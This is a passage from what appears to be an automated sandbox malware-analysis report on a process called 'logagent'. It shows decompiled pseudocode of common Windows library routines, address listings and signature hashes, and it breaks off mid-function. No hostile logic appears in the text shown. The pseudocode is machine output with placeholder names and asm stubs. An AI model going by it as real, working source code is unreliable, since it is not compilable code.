						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E051FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L051D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E051FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0523500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E051F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                              0x052351be
                                              0x052351c3
                                              0x052351c8
                                              0x052351cd
                                              0x052351d0
                                              0x052351d3
                                              0x052351d8
                                              0x052351db
                                              0x052351de
                                              0x052351e0
                                              0x052351e3
                                              0x052351e6
                                              0x052351e8
                                              0x05235342
                                              0x05235351
                                              0x05235356
                                              0x0523535a
                                              0x05235360
                                              0x05235363
                                              0x05235366
                                              0x05235369
                                              0x05235369
                                              0x0523536b
                                              0x0523536b
                                              0x05235370
                                              0x052353a3
                                              0x052353a4
                                              0x052353a6
                                              0x052353ab
                                              0x052353ab
                                              0x052353ae
                                              0x052353ae
                                              0x052353b5
                                              0x052353bf
                                              0x052353bf
                                              0x05235375
                                              0x05235396
                                              0x052353a0
                                              0x052353a0
                                              0x00000000
                                              0x05235396
                                              0x05235377
                                              0x05235379
                                              0x0523537f
                                              0x0523538c
                                              0x05235390
                                              0x00000000
                                              0x05235390
                                              0x052351ee
                                              0x052351f1
                                              0x05235301
                                              0x05235310
                                              0x05235315
                                              0x05235318
                                              0x0523531b
                                              0x05235320
                                              0x0523532e
                                              0x05235331
                                              0x00000000
                                              0x05235331
                                              0x05235328
                                              0x05235329
                                              0x00000000
                                              0x05235329
                                              0x052351fa
                                              0x05235235
                                              0x05235236
                                              0x05235239
                                              0x0523523f
                                              0x05235240
                                              0x05235241
                                              0x05235242
                                              0x05235246
                                              0x05235247
                                              0x0523524e
                                              0x05235251
                                              0x05235267
                                              0x05235269
                                              0x0523526e
                                              0x0523527d
                                              0x0523527e
                                              0x05235281
                                              0x05235282
                                              0x05235287
                                              0x05235288
                                              0x0523528a
                                              0x0523528f
                                              0x05235294
                                              0x00000000
                                              0x00000000
                                              0x0523529a
                                              0x0523529c
                                              0x0523529e
                                              0x0523529e
                                              0x052352a4
                                              0x052352b0
                                              0x00000000
                                              0x00000000
                                              0x052352ba
                                              0x052352bc
                                              0x052352bc
                                              0x052352d4
                                              0x052352d9
                                              0x052352dc
                                              0x052352e1
                                              0x00000000
                                              0x00000000
                                              0x052352e7
                                              0x052352f4
                                              0x00000000
                                              0x052352f4
                                              0x05235270
                                              0x00000000
                                              0x05235270
                                              0x052351fc
                                              0x052351fd
                                              0x05235202
                                              0x05235203
                                              0x05235205
                                              0x0523520a
                                              0x0523520f
                                              0x00000000
                                              0x00000000
                                              0x0523521b
                                              0x05235226
                                              0x0523522b
                                              0x0523521d
                                              0x0523521d
                                              0x05235222
                                              0x05235222
                                              0x0523522d
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: a9a92bb219c3e4c92ec098e50fac7853918cb3cf7794b4af0483af47a0fb411f
                                              • Instruction ID: f5aba5973c06cbb138fd50fca7ac2d1de1a6aabe60d1e573fef30a825f027e3f
                                              • Opcode Fuzzy Hash: a9a92bb219c3e4c92ec098e50fac7853918cb3cf7794b4af0483af47a0fb411f
                                              • Instruction Fuzzy Hash: 62516AB1A246099FDB28DFA8D885BAEBBF9FF48700F14402DE949EB251D7719940CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E051DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x52ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E051D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05288CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E051F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E051FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E051FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E051D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05288F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E051FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x52a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x52a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x52a8628; // 0x0
							_t116 =  *0x52a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                              0x051db94c
                                              0x051db956
                                              0x051db95c
                                              0x051db95e
                                              0x051db964
                                              0x051db969
                                              0x051db96d
                                              0x051db96d
                                              0x051db970
                                              0x051db974
                                              0x051db97a
                                              0x051dbadf
                                              0x051dbadf
                                              0x051dbae2
                                              0x051dbae4
                                              0x051dbae6
                                              0x051dbaf0
                                              0x05222cb8
                                              0x051dbaf6
                                              0x051dbaf6
                                              0x051dbaf6
                                              0x051dbafd
                                              0x051dbb1f
                                              0x051dbb1f
                                              0x051dbaff
                                              0x051dbb00
                                              0x051dbb00
                                              0x051dbb03
                                              0x051dbb03
                                              0x051dbacb
                                              0x051dbacf
                                              0x051dbad0
                                              0x051dbad1
                                              0x051dbadc
                                              0x051dbadc
                                              0x051db980
                                              0x051db980
                                              0x051db988
                                              0x051db98b
                                              0x051db98d
                                              0x051db990
                                              0x051db993
                                              0x051db999
                                              0x051db99b
                                              0x051db9a1
                                              0x051db9a5
                                              0x051db9aa
                                              0x051db9b0
                                              0x051db9bb
                                              0x051db9c0
                                              0x051db9c3
                                              0x051db9ca
                                              0x051db9cc
                                              0x051db9cf
                                              0x051db9d3
                                              0x051db9d7
                                              0x051dba94
                                              0x051dba94
                                              0x051dba98
                                              0x051dbaa3
                                              0x05222ccb
                                              0x051dbaa9
                                              0x051dbaa9
                                              0x051dbaa9
                                              0x051dbab1
                                              0x05222cd5
                                              0x05222cdd
                                              0x05222cdd
                                              0x051dbabb
                                              0x051dbabc
                                              0x051dbac2
                                              0x051dbac3
                                              0x051dbac3
                                              0x051dbac6
                                              0x00000000
                                              0x051db9dd
                                              0x051db9dd
                                              0x051db9e7
                                              0x051db9e7
                                              0x051db9ec
                                              0x051db9ec
                                              0x051db9f1
                                              0x051db9f5
                                              0x051db9fa
                                              0x051dba00
                                              0x051dba0c
                                              0x051dba10
                                              0x051dba10
                                              0x051dba12
                                              0x051dba18
                                              0x00000000
                                              0x00000000
                                              0x051dbb26
                                              0x051dbb26
                                              0x051dba1e
                                              0x051dba1e
                                              0x051dba23
                                              0x051dba25
                                              0x051dba2c
                                              0x051dba30
                                              0x051dba35
                                              0x051dba35
                                              0x051dba41
                                              0x051dba46
                                              0x051dba4c
                                              0x051dba50
                                              0x051dba54
                                              0x051dba6a
                                              0x051dba6e
                                              0x051dba70
                                              0x051dba74
                                              0x051dba78
                                              0x051dba7a
                                              0x051dba7c
                                              0x051dba8e
                                              0x051dba90
                                              0x051dba92
                                              0x051dbb14
                                              0x051dbb14
                                              0x051dbb16
                                              0x051dbb16
                                              0x00000000
                                              0x051dba7c
                                              0x051dbb0a
                                              0x051dbb0d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051dbb0f

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051DB9A5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: 3c1bb50ef0ba032ca48998a14178355532d2749ea3bea3c0af466824aecf2662
                                              • Instruction ID: 373be1d09e387596d9999186e96f6cf3a067ddd85d32fdcda4e195b07c610483
                                              • Opcode Fuzzy Hash: 3c1bb50ef0ba032ca48998a14178355532d2749ea3bea3c0af466824aecf2662
                                              • Instruction Fuzzy Hash: F2514871A18341CFC724DF29C08492AFBE6BB88640F56896EF58687355DB35E840CFA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E051BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x528f7a8);
				E0520D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0520D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E051FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E051FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0520DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E051FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E051FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E051FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E051FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                              0x051bb171
                                              0x051bb171
                                              0x051bb171
                                              0x051bb171
                                              0x051bb171
                                              0x051bb176
                                              0x051bb17b
                                              0x051bb180
                                              0x051bb186
                                              0x051bb18f
                                              0x051bb198
                                              0x051bb1a4
                                              0x051bb1aa
                                              0x05214802
                                              0x05214802
                                              0x05214805
                                              0x0521480c
                                              0x0521480e
                                              0x051bb1d1
                                              0x051bb1d3
                                              0x051bb1de
                                              0x051bb1de
                                              0x05214817
                                              0x0521481e
                                              0x05214820
                                              0x05214822
                                              0x05214822
                                              0x05214824
                                              0x05214824
                                              0x0521482a
                                              0x00000000
                                              0x00000000
                                              0x05214835
                                              0x0521483a
                                              0x0521483d
                                              0x0521483f
                                              0x05214842
                                              0x05214842
                                              0x05214842
                                              0x05214846
                                              0x0521484c
                                              0x0521484e
                                              0x05214851
                                              0x05214851
                                              0x05214853
                                              0x05214854
                                              0x05214854
                                              0x05214858
                                              0x0521485a
                                              0x0521485a
                                              0x0521485d
                                              0x0521485f
                                              0x05214861
                                              0x05214861
                                              0x05214866
                                              0x0521486b
                                              0x0521486e
                                              0x05214871
                                              0x05214876
                                              0x05214876
                                              0x05214878
                                              0x0521487b
                                              0x05214884
                                              0x05214884
                                              0x00000000
                                              0x0521487d
                                              0x0521487d
                                              0x05214882
                                              0x05214889
                                              0x05214889
                                              0x0521488f
                                              0x05214891
                                              0x052148e0
                                              0x052148e2
                                              0x052148e4
                                              0x052148e4
                                              0x052148e7
                                              0x052148e7
                                              0x052148ed
                                              0x052148f4
                                              0x052148f6
                                              0x05214951
                                              0x05214951
                                              0x05214953
                                              0x05214953
                                              0x05214956
                                              0x05214956
                                              0x05214958
                                              0x05214959
                                              0x05214959
                                              0x0521495d
                                              0x0521495d
                                              0x0521495f
                                              0x0521495f
                                              0x05214965
                                              0x05214969
                                              0x052149ba
                                              0x052149ba
                                              0x052149c1
                                              0x052149c5
                                              0x052149cc
                                              0x052149d4
                                              0x052149d7
                                              0x052149da
                                              0x052149e4
                                              0x052149e5
                                              0x052149f3
                                              0x05214a02
                                              0x00000000
                                              0x05214a02
                                              0x05214972
                                              0x05214974
                                              0x00000000
                                              0x00000000
                                              0x05214976
                                              0x05214979
                                              0x05214982
                                              0x05214983
                                              0x05214984
                                              0x0521498b
                                              0x0521498d
                                              0x05214991
                                              0x05214993
                                              0x05214999
                                              0x0521499d
                                              0x052149a2
                                              0x052149a2
                                              0x052149a2
                                              0x05214999
                                              0x052149ac
                                              0x00000000
                                              0x052149b3
                                              0x052148f8
                                              0x052148fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052148fe
                                              0x05214895
                                              0x0521489c
                                              0x052148ad
                                              0x052148b2
                                              0x052148b5
                                              0x052148b7
                                              0x052148ba
                                              0x052148bc
                                              0x052148c6
                                              0x052148c6
                                              0x052148cb
                                              0x052148d1
                                              0x052148d4
                                              0x052148d8
                                              0x052148d8
                                              0x00000000
                                              0x052148d8
                                              0x052148be
                                              0x052148c0
                                              0x00000000
                                              0x00000000
                                              0x052148c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052148c4
                                              0x00000000
                                              0x05214882
                                              0x0521487b
                                              0x05214904
                                              0x05214906
                                              0x00000000
                                              0x00000000
                                              0x05214908
                                              0x0521490e
                                              0x00000000
                                              0x00000000
                                              0x05214910
                                              0x05214917
                                              0x05214917
                                              0x00000000
                                              0x05214917
                                              0x051bb1ba
                                              0x052147f9
                                              0x052147fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052147fc
                                              0x051bb1c0
                                              0x051bb1c0
                                              0x051bb1c3
                                              0x051bb1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: 33eaa452652efcd09adacb6087c47695bb7a1eb9397df9a7183c741c96ee8726
                                              • Instruction ID: c5f15d608be416805eda0fa798d68b06c4ed2b74c915bfbd7b36bd1887152b57
                                              • Opcode Fuzzy Hash: 33eaa452652efcd09adacb6087c47695bb7a1eb9397df9a7183c741c96ee8726
                                              • Instruction Fuzzy Hash: 5E51D071E2425A8ADF31EF648884BBEBBF1BF10710F2142A9DC5EAB281D77049418B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E051E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t229;
				signed int _t233;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t297;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;
				void* _t338;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x52ad360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x52ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t338 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t279 = 0x48;
				_t307 = 0 | _t338 == 0x00000000;
				_t319 = 0;
				_v37 = _t338 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = L051D4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t307 = _v32;
							 *(_t326 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t307 - 0x52a8478;
								 *_t326 = ((0 | _t307 == 0x052a8478) - 0x00000001 & 0xfffffffb) + 7;
								E051FF3E0(_t321,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t336 = _t336 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E052439F2(_t321);
									_t307 = _v32;
									_t321 = _t273;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t326 + _t281 * 4;
